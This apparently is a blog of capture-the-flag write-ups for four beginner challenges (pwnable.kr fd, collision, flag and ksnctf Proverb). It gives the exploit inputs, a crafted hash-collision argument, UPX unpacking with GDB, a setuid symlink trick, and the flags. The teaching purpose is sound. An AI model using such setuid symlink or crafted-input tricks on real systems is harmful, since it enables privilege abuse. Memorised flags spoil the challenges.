pwnable.kr Toddler's Bottle (easy) write-up

pwnable.kr has a collection of pwning problems with a wide range of difficulty. This article is the write-up for Toddler’s Bottle (easy) section.

##fd (10/26/2015)

This is the easiest problem and is about Linux file descriptor. As given, connect to the server ssh fd@pwnable.kr -p 2222.

fd@ubuntu:~$ ls -al
total 32
drwxr-x---  4 root fd   4096 Aug 20  2014 .
dr-xr-xr-x 55 root root 4096 Sep 20 23:22 ..
d---------  2 root root 4096 Jun 12  2014 .bash_history
-r-sr-x---  1 fd2  fd   7322 Jun 11  2014 fd
-rw-r--r--  1 root root  418 Jun 11  2014 fd.c
-r--r-----  1 fd2  root   50 Jun 11  2014 flag
dr-xr-xr-x  2 root root 4096 Aug 20  2014 .irssi

It seems that you can read the source code for the program fd.

char buf[32];
int main(int argc, char* argv[], char* envp[]){
	if(argc<2){
		printf("pass argv[1] a number\n");
		return 0;
	}
	int fd = atoi( argv[1] ) - 0x1234;
	int len = 0;
	len = read(fd, buf, 32);
	if(!strcmp("LETMEWIN\n", buf)){
		printf("good job :)\n");
		system("/bin/cat flag");
		exit(0);
	}
	printf("learn about Linux file IO\n");
	return 0;

}

So it seems that when buf == "LETMEWIN\n, you can get the flag. Since fd == 0 is stdin, all you need to do is to give 0x1234 (4660 in decimal) as argv[1] and input “LETMEWIN\n”

fd@ubuntu:~$ ./fd 4660
LETMEWIN
good job :)
mommy! I think I know what a file descriptor is!!

Flag is: mommy! I think I know what a file descriptor is!!

##collision (10/26/2015)
Similar to fd, you can read the source code for the program col.

#include <stdio.h>
#include <string.h>
unsigned long hashcode = 0x21DD09EC;
unsigned long check_password(const char* p){
	int* ip = (int*)p;
	int i;
	int res=0;
	for(i=0; i<5; i++){
		res += ip[i];
	}
	return res;
}

int main(int argc, char* argv[]){
	if(argc<2){
		printf("usage : %s [passcode]\n", argv[0]);
		return 0;
	}
	if(strlen(argv[1]) != 20){
		printf("passcode length should be 20 bytes\n");
		return 0;
	}

	if(hashcode == check_password( argv[1] )){
		system("/bin/cat flag");
		return 0;
	}
	else
		printf("wrong passcode.\n");
	return 0;
}

At int *ip = (int*)p, const char *p is casted to int *. Since the size of int is 4 bytes, the size of char is 1 byte and the length of passcode is 20 bytes, you can read the flag when the sum of five int blocks is 0x21DD09EC. Since 0x21DD09EC = 0x06C5CEC8 * 4 + 0x06C5CECC and the system is little-endian, your injection code should be:

col@ubuntu:~$ ./col $(perl -e 'print "\xc8\xce\xc5\x06"x4 . "\xcc\xce\xc5\x06"')
daddy! I just managed to create a hash collision :)

Flag is: daddy! I just managed to create a hash collision :)

##flag (10/26/2015)
This is a reversing problem. You can download the file flag here.

taishi@sirius:~/blackhat_python/ctf/pwnable.kr|master⚡
⇒  file flag
flag: ELF 64-bit LSB  executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
taishi@sirius:~/blackhat_python/ctf/pwnable.kr|master⚡
⇒  ./flag
I will malloc() and strcpy the flag there. take it.

As you execute, you see a weird message. However, you can’t analyze this program using GDB as shown below.

taishi@sirius:~/blackhat_python/ctf/pwnable.kr|master⚡
⇒  gdb -q flag            

warning: ~/.gdbinit.local: No such file or directory
Reading symbols from flag...(no debugging symbols found)...done.
gdb$ info files
Symbols from "/home/taishi/blackhat_python/ctf/pwnable.kr/flag".
gdb$ info functions
All defined functions:

This implies that some kind of anti-debugging techniques are applied to this program. Let’s examine.

taishi@sirius:~/blackhat_python/ctf/pwnable.kr|master⚡
⇒  strings flag | grep UPX
UPX!
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.08 Copyright (C) 1996-2011 the UPX Team. All Rights Reserved. $
UPX!
UPX!

And here we go. flag file seems to be packed with UPX. You can easily unpack it using a tool (you can download the official UPX packer/unpacker here).

taishi@sirius:~/blackhat_python/ctf/pwnable.kr|master⚡
⇒  ./upx-3.91-i386_linux/upx -d flag 
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

File size         Ratio      Format      Name
--------------------   ------   -----------   -----------
887219 <-    335288   37.79%  linux/ElfAMD   flag

Unpacked 1 file.

Then you can analyze it with GDB.

taishi@sirius:~/blackhat_python/ctf/pwnable.kr|master⚡
⇒  gdb -q flag
gdb$ disassemble main
Dump of assembler code for function main:
0x0000000000401164 <+0>:	push   rbp
0x0000000000401165 <+1>:	mov    rbp,rsp
0x0000000000401168 <+4>:	sub    rsp,0x10
0x000000000040116c <+8>:	mov    edi,0x496658
0x0000000000401171 <+13>:	call   0x402080 <puts>
0x0000000000401176 <+18>:	mov    edi,0x64
0x000000000040117b <+23>:	call   0x4099d0 <malloc>
0x0000000000401180 <+28>:	mov    QWORD PTR [rbp-0x8],rax
0x0000000000401184 <+32>:	mov    rdx,QWORD PTR [rip+0x2c0ee5]        # 0x6c2070 <flag>
0x000000000040118b <+39>:	mov    rax,QWORD PTR [rbp-0x8]
0x000000000040118f <+43>:	mov    rsi,rdx
0x0000000000401192 <+46>:	mov    rdi,rax
0x0000000000401195 <+49>:	call   0x400320
0x000000000040119a <+54>:	mov    eax,0x0
0x000000000040119f <+59>:	leave  
0x00000000004011a0 <+60>:	ret    
End of assembler dump.

mov rdx, QWORD PTR [rip+0x2c0ee5] at <main+32> is interesting. Let’s set the breakpoint right after (<main+39>), and analyze what was passed to rdx.

gdb$ break *0x000000000040118b
Breakpoint 2 at 0x40118b
gdb$ c
Continuing.
gdb$ x/s $rdx
0x496628:	"UPX...? sounds like a delivery service :)"

Here it is! Flag is: UPX…? sounds like a delivery service :)

ksnctf Proverb write-up

This article is a write-up for Proverb at ksnctf.

Using given information, let’s connect to the server ssh -p 10022 q13@ctfq.sweetduet.info.

taishi@sirius:~
⇒  ssh -p 10022 q13@ctfq.sweetduet.info
q13@ctfq.sweetduet.info's password: 
Last login: Tue Oct 20 20:12:26 2015 from 10.0.2.2
[q13@localhost ~]$ ls -al
total 48
drwxr-xr-x   2 root root  4096 Jun  1  2012 .
drwxr-xr-x. 17 root root  4096 Oct  6  2014 ..
-rw-r--r--   1 root root    18 May 11  2012 .bash_logout
-rw-r--r--   1 root root   176 May 11  2012 .bash_profile
-rw-r--r--   1 root root   124 May 11  2012 .bashrc
-r--------  19 q13a q13a    22 Jun  1  2012 flag.txt
---s--x--x  17 q13a q13a 14439 Jun  1  2012 proverb
-r--r--r--   2 root root   755 Jun  1  2012 proverb.txt
-r--r--r--   1 root root   151 Jun  1  2012 readme.txt
[q13@localhost ~]$ cat readme.txt 
You are not allowed to connect internet and write the home directory.
If you need temporary directory, use /tmp.
Sometimes this machine will be reset.
[q13@localhost ~]$ file proverb
proverb: setuid executable, regular file, no read permission
[q13@localhost ~]$ ./proverb 
Take heed of the snake in the grass.
[q13@localhost ~]$ ./proverb
Misfortunes never come singly.
[q13@localhost ~]$ ./proverb
Spare the rod and spoil the child.
[q13@localhost ~]$ ./proverb
Nothing ventured, nothing gained.
[q13@localhost ~]$ ./proverb
Take heed of the snake in the grass.

Inside, there are three files: flag.txt (probably contains FLAG), proverb (executable with SUID), and proverb.txt. It seems that proverb randomly chooses and prints out a line of strings inside proverb.txt.
Since you can’t analyze proverb using GDB (no read access), let’s think about somehow using /tmp directory.

However, although you have a write-permission, you don’t have read-permission to /tmp directory.

[q13@localhost ~]$ ls /tmp
ls: cannot open directory /tmp: Permission denied

However, there seems to be proverb.txt in /tmp as well, saying that you should make a subdirectory.

[q13@localhost ~]$ cat /tmp/proverb.txt
Please make your own subdirectory.

Make sense!. Let’s create a subdirectory inside /tmp, then make a symbolic link of ~/proverb and ~/flag.txt and rename flag.txt to proverb.txt.

[q13@localhost ~]$ mkdir /tmp/my_dir
[q13@localhost ~]$ cd /tmp/my_dir
[q13@localhost my_dir]$ ln -s ~/proverb .
[q13@localhost my_dir]$ ln -s ~/flag.txt proverb.txt
[q13@localhost my_dir]$ ./proverb
FLAG_XoK9PzskYedj/T&B

Flag is: FLAG_XoK9PzskYedj/T&B